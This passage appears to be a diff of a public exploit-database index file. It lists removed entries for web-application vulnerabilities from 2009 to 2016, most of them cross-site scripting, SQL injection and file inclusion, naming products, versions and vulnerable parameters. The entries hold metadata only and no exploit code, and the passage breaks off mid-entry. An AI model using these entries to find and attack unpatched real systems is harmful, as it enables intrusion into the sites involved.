-34633,exploits/php/webapps/34633.txt,"SpiceWorks - 'query' Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps, -34634,exploits/php/webapps/34634.txt,"Multple I-Escorts Products - 'escorts_search.php' Cross-Site Scripting",2010-09-15,"599eme Man",php,webapps, -34635,exploits/php/webapps/34635.txt,"Willscript Auction Website Script - 'category.php' SQL Injection",2009-08-06,"599eme Man",php,webapps, -34636,exploits/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Local File Inclusion",2010-09-15,"John Leitch",php,webapps, -34639,exploits/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",php,webapps, -34640,exploits/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",php,webapps, -34641,exploits/php/webapps/34641.py,"ChillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps, -34642,exploits/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-06,"599eme Man",php,webapps, -34643,exploits/php/webapps/34643.txt,"Silurus Classifieds - 'category.php?ID' Cross-Site Scripting",2009-08-06,Moudi,php,webapps, -34644,exploits/php/webapps/34644.txt,"Silurus Classifieds - 'wcategory.php?ID' Cross-Site Scripting",2009-08-06,Moudi,php,webapps, -34645,exploits/php/webapps/34645.txt,"Silurus Classifieds - 'search.php?keywords' Cross-Site Scripting",2009-08-06,Moudi,php,webapps, -34646,exploits/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injections",2009-08-03,Drosophila,php,webapps, -34649,exploits/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps, -34650,exploits/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 - Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps, -34651,exploits/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps, -34652,exploits/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps, -34653,exploits/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injections",2010-09-17,"High-Tech Bridge SA",php,webapps, -34655,exploits/php/webapps/34655.txt,"Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps, -34656,exploits/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - '/includes/video_ad.php?pic_id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34657,exploits/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'linkvideos_listing.php?category' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34658,exploits/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/templates/header1.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34659,exploits/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34660,exploits/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'embed.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34661,exploits/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'info.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34662,exploits/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'lyrics.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34663,exploits/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/adult/video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34664,exploits/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps, -34666,exploits/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,php,webapps,80 -34672,exploits/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090 -34673,exploits/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps, -34674,exploits/php/webapps/34674.txt,"WebStatCaffe - '/stat/mostvisitpage.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34675,exploits/php/webapps/34675.txt,"WebStatCaffe - '/stat/visitorduration.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34676,exploits/php/webapps/34676.txt,"WebStatCaffe - '/stat/mostvisitpagechart.php?nopagesmost' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34677,exploits/php/webapps/34677.txt,"WebStatCaffe - '/stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps, -34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps, -34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps, -34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,ios,webapps,8080 -34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,asp,webapps, -34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,php,webapps, -34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,php,webapps, -34690,exploits/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps, -34692,exploits/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Cross-Site Scripting",2009-07-27,u.f.,php,webapps, -34693,exploits/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps, -34694,exploits/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps, -34699,exploits/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps, -34700,exploits/php/webapps/34700.txt,"WebShop Hun 1.062s - '/index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps, -34701,exploits/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps, -34702,exploits/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps, -34703,exploits/php/webapps/34703.txt,"Million Dollar Pixel Ads - Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps, -34704,exploits/php/webapps/34704.txt,"MyDLstore Pixel Ad Script - 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps, -34705,exploits/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injections",2009-07-21,n3w7u,php,webapps, -34706,exploits/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Remote File Inclusion",2009-07-21,Moudi,php,webapps, -34707,exploits/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps, -34708,exploits/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' SQL Injection",2010-09-23,FL0RiX,php,webapps, -34709,exploits/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34710,exploits/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-21,"599eme Man",php,webapps, -34711,exploits/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php?cid' SQL Injection",2009-08-21,"599eme Man",php,webapps, -34712,exploits/php/webapps/34712.txt,"Freewebscriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34713,exploits/php/webapps/34713.txt,"Freelancers - 'placebid.php?id' Cross-Site Scripting",2009-08-17,Moudi,php,webapps, -34714,exploits/php/webapps/34714.txt,"Freelancers - 'post_resume.php?jobid' Cross-Site Scripting",2009-08-17,Moudi,php,webapps, -34715,exploits/php/webapps/34715.txt,"AdQuick - 'account.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34803,exploits/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps, -34804,exploits/php/webapps/34804.txt,"Rentventory - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps, -34717,exploits/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps, -34718,exploits/php/webapps/34718.txt,"M/Monit 3.3.2 - Cross-Site Request Forgery",2014-09-20,"Dolev Farhi",php,webapps, -34824,exploits/php/webapps/34824.txt,"Lantern CMS - '11-login.asp' Cross-Site Scripting",2010-10-08,"High-Tech Bridge SA",php,webapps, -34825,exploits/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,php,webapps, -34826,exploits/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting",2010-10-08,"Anatolia Security",php,webapps, -34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",php,webapps, -34722,exploits/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injections",2014-09-20,BillV-Lists,php,webapps, -34730,exploits/php/webapps/34730.txt,"DragDropCart - '/assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34731,exploits/php/webapps/34731.txt,"DragDropCart - '/includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34732,exploits/php/webapps/34732.txt,"DragDropCart - 'index.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34733,exploits/php/webapps/34733.txt,"DragDropCart - 'search.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34734,exploits/php/webapps/34734.txt,"DragDropCart - 'login.php?redirect' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34735,exploits/php/webapps/34735.txt,"DragDropCart - 'productdetail.php?product' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34736,exploits/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps, -34737,exploits/php/webapps/34737.txt,"EZodiak - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34738,exploits/php/webapps/34738.txt,"GejoSoft Image Hosting Community - Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34740,exploits/php/webapps/34740.txt,"MyWeight 1.0 - 'user_addfood.php?date' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34741,exploits/php/webapps/34741.txt,"MyWeight 1.0 - 'user_forgot_pwd_form.php?info' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34742,exploits/php/webapps/34742.txt,"MyWeight 1.0 - 'user_login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,php,webapps, -34743,exploits/php/webapps/34743.txt,"Proxy List Script - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34744,exploits/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - 'listads.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-20,Moudi,php,webapps, -34745,exploits/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - 'subclass.php?cname' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34746,exploits/php/webapps/34746.txt,"Web TV - 'chn' Cross-Site Scripting",2009-07-20,Moudi,php,webapps, -34747,exploits/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps, -40338,exploits/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80 -34748,exploits/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps, -34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps, -34753,exploits/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure",2014-09-24,ZoRLu,asp,webapps,80 -34754,exploits/php/webapps/34754.py,"Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 -34755,exploits/php/webapps/34755.py,"Joomla! Component com_macgallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 -34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,php,webapps,80 -34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 -34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80 -34761,exploits/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 -34762,exploits/php/webapps/34762.txt,"WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 -34763,exploits/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 -34764,exploits/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 -34769,exploits/php/webapps/34769.txt,"MySITE - SQL Injection / Cross-Site Scripting",2010-09-27,MustLive,php,webapps, -34770,exploits/php/webapps/34770.txt,"PHP Scripts Now Hangman - 'index.php?n' SQL Injection",2009-07-21,Moudi,php,webapps, -34771,exploits/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php?letters' Cross-Site Scripting",2009-07-21,Moudi,php,webapps, -34772,exploits/php/webapps/34772.txt,"Honest Traffic - 'msg' Cross-Site Scripting",2009-07-17,Moudi,php,webapps, -34773,exploits/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps, -34774,exploits/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - 'feedback.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps, -34775,exploits/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps, -34776,exploits/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - 'lostpassword.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps, -34779,exploits/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 -34783,exploits/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps, -34784,exploits/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' HTML Injection (1)",2010-09-28,"Veerendra G.G",php,webapps, -34785,exploits/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps, -34786,exploits/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps, -34787,exploits/php/webapps/34787.txt,"MODx 2.0.2-pl - '/manager/index.php?modahsh' Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps, -34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps, -34789,exploits/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps, -34790,exploits/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps, -34791,exploits/php/webapps/34791.txt,"Swinger Club Portal - 'start.php?id' SQL Injection",2009-07-07,Moudi,php,webapps, -34792,exploits/php/webapps/34792.txt,"Swinger Club Portal - 'start.php?go' Remote File Inclusion",2009-07-07,Moudi,php,webapps, -34793,exploits/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps, -34794,exploits/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products - 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps, -34795,exploits/php/webapps/34795.txt,"WebAsyst Shop-Script - 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps, -34797,exploits/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps, -34782,exploits/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps, -34781,exploits/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 -34798,exploits/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps, -34816,exploits/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - Local File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps, -34800,exploits/php/webapps/34800.txt,"Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps, -34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,php,webapps, -34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,php,webapps, -34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps, -34812,exploits/php/webapps/34812.html,"Docebo 3.6 - 'description' Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps, -34813,exploits/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps, -34814,exploits/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps, -34820,exploits/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' SQL Injection",2010-10-06,FL0RiX,php,webapps, -34817,exploits/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps, -34818,exploits/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446 -34975,exploits/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Directory Traversal",2010-11-08,"John Leitch",php,webapps, -34976,exploits/php/webapps/34976.txt,"WordPress Plugin Vodpod Video Gallery 3.1.5 - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps, -34977,exploits/php/webapps/34977.txt,"WordPress Plugin jRSS Widget 1.1.1 - 'url' Information Disclosure",2010-11-08,"John Leitch",php,webapps, -34827,exploits/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps, -34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps, -34833,exploits/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps, -34834,exploits/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps, -34837,exploits/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps, -34839,exploits/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps, -34840,exploits/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps, -34841,exploits/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps, -34842,exploits/php/webapps/34842.txt,"TWiki 5.0 - '/bin/view?rev' Cross-Site Scripting",2010-10-14,"DOUHINE Davy",php,webapps, -34843,exploits/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Cross-Site Scripting Vulnerabilities",2010-10-14,"DOUHINE Davy",php,webapps, -34845,exploits/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Cross-Site Scripting",2009-08-07,Moudi,php,webapps, -34847,exploits/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps, -34849,exploits/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,php,webapps, -34850,exploits/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps, -34851,exploits/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,php,webapps,80 -34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 -34854,exploits/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 -34858,exploits/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 -34861,exploits/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80 -34863,exploits/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injections",2014-10-02,Portcullis,php,webapps,80 -34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 -34865,exploits/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps, -34871,exploits/php/webapps/34871.txt,"eCardMAX FormXP - 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,php,webapps, -34873,exploits/php/webapps/34873.txt,"Wap-motor - 'image' Directory Traversal",2009-08-27,Inj3ct0r,php,webapps, -34874,exploits/php/webapps/34874.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps, -34875,exploits/php/webapps/34875.txt,"QuarkMail - 'tf' Directory Traversal",2009-08-28,Securitylab.ir,php,webapps, -34876,exploits/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,php,webapps, -34877,exploits/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -34878,exploits/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps, -34882,exploits/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting / HTML Injection",2010-10-19,"High-Tech Bridge SA",php,webapps, -34883,exploits/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps, -34884,exploits/php/webapps/34884.txt,"JCE-Tech SearchFeed Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -34885,exploits/php/webapps/34885.txt,"Auction RSS Content Script - 'rss.php?id' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -34886,exploits/php/webapps/34886.txt,"Auction RSS Content Script - 'search.php?id' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -34887,exploits/php/webapps/34887.txt,"JCE-Tech PHP Video Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps, -34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,php,webapps, -34890,exploits/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps, -34891,exploits/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' HTML Injection (2)",2010-10-21,"SecPod Research",php,webapps, -34892,exploits/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps, -34893,exploits/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps, -34894,exploits/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection",2009-07-20,"599eme Man",php,webapps, -34895,exploits/cgi/webapps/34895.rb,"Bash CGI - Remote Command Injection (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps, -34922,exploits/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps, -35023,exploits/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps, -35024,exploits/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps, -34902,exploits/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php?searchQuery' Cross-Site Scripting",2009-08-20,Moudi,php,webapps, -34903,exploits/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php?catid' SQL Injection",2009-08-20,Moudi,php,webapps, -34904,exploits/php/webapps/34904.txt,"Radvision Scopia - '/entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps, -34905,exploits/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3?bn' Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps, -34906,exploits/php/webapps/34906.txt,"W-Agora 4.2.1 - 'search.php?bn' Cross-Site Scripting",2010-10-22,MustLive,php,webapps, -34907,exploits/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - '/ivt/ivtserver?parm1' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34908,exploits/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/acl?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34909,exploits/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/domain?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34910,exploits/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/group?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34911,exploits/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gso?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34912,exploits/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gsogroup?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34913,exploits/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/os?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34914,exploits/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/pop?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34915,exploits/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for 